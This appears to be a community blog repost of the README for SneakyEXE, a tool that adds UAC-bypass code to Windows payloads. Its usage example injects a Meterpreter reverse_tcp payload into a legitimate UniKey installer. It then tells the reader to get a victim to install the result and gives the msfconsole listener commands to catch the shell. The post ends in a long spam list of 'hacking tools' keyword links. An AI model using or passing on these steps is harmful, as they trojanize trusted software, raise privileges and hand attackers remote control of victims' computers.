Blog ini non-partisan dan terbuka kepada semua tanpa mengira fahaman politik. Emel atau MMS ucapan / rayuan / keluhan / pengumuman anda ke tamanperpaduan.terusblog@blogger.com untuk tulisan anda tersiar di blog ini serta merta. Gambar juga boleh disertakan dan tertakluk kepada syarat.
Posting tidak sepatutnya akan dinyahsiarkan.

Selasa, 25 Ogos 2020

SneakyEXE: An "UAC-Bypassing" Codes Embedding Tool For Your Win32 Payload


About SneakyEXE
   SneakyEXE is a tool which helps you embedding a UAC-Bypassing function into your custom Win32 payloads (x86_64 architecture specifically).

   SneakyEXE was tested on:
  • Windows 7, 8, 10 (64 bit)
  • Parrot Security OS 4.7

   Requirements of SneakyEXE:
  • For Linux:   Architecture: Optional
       Python 3.7.x: Yes
       Module: termcolor
       Distro: Any
       Distro version: Any
  • For Windows:   Architecture: x86_64
       Python 3.7.x: No
       Module: No
       Windows version: 7, 8, 10

SneakyEXE's Installtion for Linux
   You must install Python 3 first:
  • For Debian-based distros: sudo apt install python3
  • For Arch Linux based distros: sudo pacman -S python3
   And then, open your Terminal and enter these commands:


SneakyEXE's Installtion for Windows
  • Download SneakEXE-master zip file.
  • Unzip it into your optional directory.
  • Change dir to \SneakyEXE\Win32\.
  • Execute sneakyexe.exe (or sys\sneakyexe.exe for an improved startup speed).
  • (Optional : you can copy sneakyexe.exe to whatever directory you want and delete the unzipped one)
   NOTE: The payload can only be successfully executed by the user with Administrator privilege. Users with limited token wouldn't succeed.

SneakyEXE GUI verion installation for Windows
   You must install Python 3 first. Download and run Python 3.7.x setup file from Python.org. On Install Python 3.7, enable Add Python 3.7 to PATH.
   Download SneakEXE-master zip file and unzip it.
   And then, open PowerShell or CMD on SneakyEXE folder where you have just unzipped SneakyEXE-master and enter these command:

pip install pillow
pip install pyinstaller
mkdir compile
cd compile
pyinstaller --windowed --onefile --icon=Icon.ico /source/Win32/GUI.py
cd dist
GUI.exe


How to use SneakyEXE?

Example:
   I dowloaded Unikey from Unikey.org.
   And then, i used msfvenom to inject payload to UniKeyNT.exe (payload used: windows/meterpreter/reverse_tcp). I called the payload file is uNiKeY.exe.

   After that, to embed UAC-Bypassing codes to uNiKeY.exe, i used this command:
python3 sneakyexe bin=/home/hildathedev/uNiKeY.exe out=/home/hildathedev/SneakyEXE

  And then, by some how, makes your victim installs the payload that was embedded UAC-Bypassing codes and enter these commands:

sudo msfconsole -q
use multi/handler
set payload windows/meterpreter/reverse_tcp
set LHOST <Your IP address>
set LHOST <Your port>
exploit


   and wait...

Disclaimer:
  • This tool was made for academic purposes or ethical cases only. I ain't taking any resposibility upon your actions if you abuse this tool for any black-hat acitivity
  • Feel free to use this project in your software, just don't reclaim the ownerhsip.

Credits: This tool does embed UACme which was originally coded by hfiref0x but the rest was pretty much all coded by me (Zenix Blurryface).

Author: Copyright © 2019 by Zenix Blurryface.


More info
  1. Hack Tools For Ubuntu
  2. Pentest Tools Nmap
  3. Github Hacking Tools
  4. Hacker Tools Github
  5. Hacker Tools List
  6. Hacking Tools Software
  7. Black Hat Hacker Tools
  8. Pentest Tools Subdomain
  9. Hack Tool Apk
  10. Usb Pentest Tools
  11. Beginner Hacker Tools
  12. Github Hacking Tools
  13. Pentest Tools Port Scanner
  14. Computer Hacker
  15. Beginner Hacker Tools
  16. Hacking Tools Windows 10
  17. Easy Hack Tools
  18. Pentest Tools Alternative
  19. Hak5 Tools
  20. Hacking Tools 2020
  21. Black Hat Hacker Tools
  22. Hacker Tools Mac
  23. Hacker Tools For Pc
  24. Pentest Tools For Android
  25. Hacking Tools For Windows
  26. Hacker Hardware Tools
  27. Hacking Tools Download
  28. Hacking Tools For Games
  29. Pentest Tools Alternative
  30. How To Install Pentest Tools In Ubuntu
  31. Nsa Hack Tools
  32. Growth Hacker Tools
  33. Pentest Tools For Windows
  34. Hacking App
  35. Best Hacking Tools 2019
  36. How To Install Pentest Tools In Ubuntu
  37. Hacking Tools Name
  38. Hack App
  39. Hacking Tools For Windows 7
  40. Pentest Automation Tools
  41. Hacker Tools
  42. Hacking Tools Mac
  43. Pentest Tools Find Subdomains
  44. Pentest Tools Url Fuzzer
  45. Pentest Tools Tcp Port Scanner
  46. Pentest Box Tools Download
  47. What Is Hacking Tools
  48. Pentest Tools Download
  49. Hacker Security Tools
  50. Hacking App
  51. Hacking Apps
  52. Hack Tool Apk No Root
  53. Hacking Tools And Software
  54. Pentest Box Tools Download
  55. Hacker Tools 2019
  56. Pentest Tools Find Subdomains
  57. Hacker Tools Linux
  58. What Is Hacking Tools
  59. Hack Tools
  60. Tools Used For Hacking
  61. Pentest Tools Open Source
  62. Install Pentest Tools Ubuntu
  63. Hacker Tools Free Download
  64. Pentest Tools List
  65. Pentest Box Tools Download
  66. Hacker Tools Hardware
  67. Pentest Tools For Windows
  68. Pentest Tools Port Scanner
  69. Pentest Automation Tools
  70. Hacker Search Tools
  71. Pentest Tools Review
  72. Hacker Tools Apk Download
  73. Hacking Tools Online
  74. Pentest Tools Subdomain
  75. Hacker Tool Kit
  76. Pentest Tools Review
  77. Pentest Tools Online
  78. How To Install Pentest Tools In Ubuntu
  79. Hacking Tools Hardware
  80. Best Hacking Tools 2020
  81. Growth Hacker Tools
  82. Growth Hacker Tools
  83. Hacking Tools Online
  84. Install Pentest Tools Ubuntu
  85. Hacking Tools For Mac
  86. Hacking Tools Download
  87. World No 1 Hacker Software
  88. Hacking Tools Free Download
  89. Physical Pentest Tools
  90. Pentest Tools Subdomain

Tiada ulasan:

Catat Ulasan